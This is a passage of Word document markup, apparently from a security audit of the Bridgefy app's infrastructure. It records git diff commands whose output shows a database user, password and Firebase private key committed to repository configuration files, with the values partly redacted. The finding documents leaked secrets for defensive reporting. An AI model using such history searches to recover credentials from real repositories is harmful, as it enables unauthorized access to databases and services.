      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="3221" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"dck[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1115" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="3653" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.vscode/launch.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.vscode/launch.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="3221" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBUSER"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"adm[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="3221" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="32"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBPASS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Dqn[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBNAME"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>staging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1511" w:val="left" w:leader="hyphen"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="1243" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"FBPRIVATEKEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"-----BEGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY-----\nMII[...]\n-----END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="82"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-APP-infra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git diff 0328b0~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0328b0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-APP-infra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1115" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="4643" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/mqtt/emqx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/mqtt/emqx.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>backend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"mongodb"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>collection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"mqttauthentications"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
